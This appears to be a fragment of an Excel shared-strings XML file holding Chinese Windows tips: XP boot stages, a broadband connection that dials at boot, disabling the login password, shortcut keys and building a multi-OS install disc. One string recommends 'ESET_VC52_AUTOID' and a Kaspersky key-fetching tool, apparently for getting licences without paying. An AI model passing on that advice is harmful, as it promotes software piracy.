    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>系统</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>开始加电自检，并调用初始化代码来初始化配置相关设备；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>MBR的引导程序</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>查找活动分区的引导扇区的地址；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>引导权交给这个引导扇区去引导操作系统；载入windows XP中的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>启动文件NTLDR</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>操作环境由DOS真实模式转换到32位操作模式；NTLDR会去寻找电脑中所有的硬盘，以便知道一共安装有多少个操作系统，并分析Boot.ini文件中所记录的操作系统信息，如果有安装多个操作系统，就会显示</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>Boot.ini文件中设置的启动菜单</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，让你选择，然后系统检查硬件并利用硬件配置文件来设置各项硬件；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NTLDR载入windows XP的核心文件NTOKRNL.exe、各项驱动程序、服务，在这个阶段中，windows会载入注册表与系统有关的项目，并将之交给图形界面控制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft office软件包</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>microsoft visual studio软件包</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>CMD：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>可以完成手续费开作，有窗口、菜单或对话框等对应单条命令操作无法比拟的功能；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>ICS共享</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>上网时，ICS主机只能使用一款网络防火墙，而客户端PC不能使用任何防火墙；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>杀毒：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>将文件特征码与病毒库特征码比较，以发现病毒，删除病毒后，但病毒对系统所做的更改并没有进行修复，所以会留下杀毒后遗症；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>控制面板---网络和共享中心---连接到网络---右下角弹出已有建立的连接的对话框---右击BC---属性---选项：去掉勾选：提示名称、密码和证书；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>新建一个宽带连接：控制面板</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网络和</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Internet---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看网络状态和任务</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置新的连接或网络</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接到</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Internet---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>您如何连接？：选择宽带</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入用户名、密码、宽带连接名称：</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>BC</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，勾选：记住密码；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>internet</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>BC---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>勾选：始终拨打默认连接；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>win+r---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>regedit---HKEY_LOCAL_MACHINE</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＼</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SOFTWARE</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＼</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＼</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＼</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CurrentVersion</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＼</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Run ---</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右边的窗口中新建一个字符串键，名字任取，双击此键输入键值为</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>c:\Windows\System32\rasphone -d BC  (</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>你的宽带连接的名称）；这样你可以在运行里输入</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>msconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>找启动项看一下是不是加入了一个</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>windows</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动项，而它的命令里就是我们的</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>c:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＼</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＼</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>System32</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＼</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>rasphone -d "BC"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，这样就可以开机连网了</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第三：单击下一步，在后面的步骤中将</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发器</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项设置为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>当前用户登陆时</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，下一步～～将</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项设置为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动程序</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，将</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序或脚本</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>” c:\Windows\System32\rasphone.exe -d bc”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单击下一步．</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>win+R---control userpasswords2---选定用户名，取消勾选：“要使用本机，用户必须输入用户名和密码”，确定后会提示输入密码。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>建议：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows后操作，将磁盘中已经存在的操作系统从低版本升级到高版本，将系统中必要的文件升级，而不需要格式化分区；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>又称修复安装，是指在当前操作系统的系统分区上再次安装相同版本的操作系统，这种安装方式只是将原有的系统文件重新复制，原操作系统中已安装的驱动程序，应用程序以及保存的系统设置，文件信息等，都将完整地保存下来；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首先通过微软的自动安装脚本制作程序创建无人值守安装脚本；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可以大大降低系统维护的难度；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用磁盘克隆软件（如Ghost)将当前操作系统分区制作成一个镜像文件；当需要重新安装系统时，只需使用该镜像文件还原系统即可，这种方式速度最快，但分区上的所有数据将被全部清除；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、关闭系统还原：系统还原功能使用的时间一长，就会占用大量的硬盘空间。因此有必要对其进行手工设置，以减少硬盘占用量。打开"系统属性"对话框，选择"系统还原"选项，选择"在所有驱动器上关闭系统还原"复选框以关闭系统还原。也可仅对系统所在的磁盘或分区设置还原。先选择系统所在的分区，单击"配置"按钮，在弹出的对话框中取消"关闭这个驱动器的系统还原"选项，并可设置用于系统还原的磁盘空间大小。（win7默认只有开启系统分区的系统还原）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>推荐使用：使Windows Media Player支持更多音视频格式的“ Codecs”（Win7codecs_v255）
     Microsoft Windows自带的“Windows Media Player”，界面简洁大方、运行流畅且占用资源较少。但是，支持常用音视频格式的确有限：不是因为微软不具备“Real Player”“暴风影音”等软件的研发技术，而是囿于高悬于Microsoft之上的“反垄断”之剑。播放软件除了系统自带的WMP（另加装Win7codecs_v255）外；最好再安装Realplayer,KM（绿色软件，只需关联即可）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>杀毒软件建议安装ESET NOD,并安装ID自动获取工具：ESET_VC52_AUTOID；卡巴斯基亦有KEY自动获取工具：Kaspersky KEY 自动获取.exe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Win7codecs_v255</t>
  </si>
  <si>
    <t>使Windows Media Player支持更多音视频格式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>http://hi.baidu.com/guoguo6688/blog/item/ca3591d331760d3d970a16fa.html</t>
  </si>
  <si>
    <t>2 将Windows XP光盘镜像和重新制作后的Windows 7光盘镜像的全部文件，分别解压到EasyBoot\disk1中(提示有重复文件，尽管覆盖就是)。将“DOS工具箱”(为可光盘启动“dos98.img”镜像文件)保存到EasyBoot\disk1\ezboot中。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 用“UltraISO”提取Windows 7简体中文旗舰版ISO镜像的光盘引导文件。具体操作：菜单/启动/保存引导文件/ 保存为“Win7.bif”，并存储在光盘镜像制作软件EasyBoot\disk1\ezboot中。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 设置“光盘选项菜单”执行命令：“安装Windows 7”对应“run Win7.bif”；“安装Windows XP”对应“run w2ksect.bin”(EasyBoot自带)；“运行DOS工具箱”对应“run dos98.img”；“重新启动计算机”对应“reboot”。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>——注意：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a 安装光盘选项菜单的背景图，应当为640 X 480“256色”的“BMP格式位图”；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>c 用“UltraISO”打开制作完成的“ISO”，只要显示“可启动UDF”(可引导光盘)，即可直接刻录光盘。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>相关软件及ISO镜像下载可登录以下链接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打造三合一安装光盘</t>
  </si>
  <si>
    <t>打造三合一安装光盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>b 制作光盘镜像ISO，引导文件为EasyBoot\disk1\ezboot\loader.bin(EasyBoot自带)；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shortcut key</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shortcut key</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>类别</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快捷键</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作内容</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查找文件或文件夹；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>重命名；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中英文切换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+Shift</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中文输入法切换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Alt+space</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Win+D</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>最小化全部窗口，看到桌面；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Win+E</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开资源管理器；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IE浏览</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+数字</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>切换到第几个选项卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>移动到文档的结尾</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F4</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示地址栏的历史记录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F5</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Home</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>移动到文档的开头</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>向文档结尾处翻页</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>放大网页</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>整理收藏夹</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>添加到收藏夹中</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Alt+Space+C(Alt+F4)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>关闭IE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>定位到文件菜单</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光标定位到地址栏\并全选地址</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Alt</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pageup(space)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开菜单</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Backspace</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>excel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Command</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>win+R</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令字</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>control userpasswords2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开用户帐户对话框，可设置：要使用本机，用户必须键入用户名和密码；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>calc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmd</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Msconfig</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>regedit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rstrui</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arp /d</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arp /a</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ipconfig</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示网络配置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果是在局域网（特别是外租房的环境），最好安装AntiARP软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 左键按信 quick launch使劲往左拖；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5 右击quick launch,取消勾选：“显示文本”和“显示标题”；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开excel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>类型</t>
  </si>
  <si>
    <t>主要工作</t>
  </si>
  <si>
    <t>特点</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>介质检查；磁盘介质测试；划分磁道和扇区；对每个扇区进行编号（C/H/S）；设置交叉因子。</t>
  </si>
  <si>
    <t>只能在DOS环境或自写的汇编指令下进行，低级格式化只能整盘进行，现在硬盘出厂都是经过低格的，实际使用不到万不得已不要使用低格。</t>
  </si>
  <si>
    <t>低级格式化对硬盘有损伤，如果硬盘已有物理坏道，则低级格式化会更加损伤硬盘，加快报废。低格的时间漫长，比如现在320G硬盘低格可能需要20小时，或更多。</t>
  </si>
  <si>
    <t>清除数据（写删除标记）；检查扇区；重新初始化引导信息；初始化分区表信息；</t>
  </si>
  <si>
    <t>可以在DOS和操作系统上进行，只能对分区操作。高级格式化只是存储数据，但如果存在坏扇区可能会导致长时间磁盘读写。</t>
  </si>
  <si>
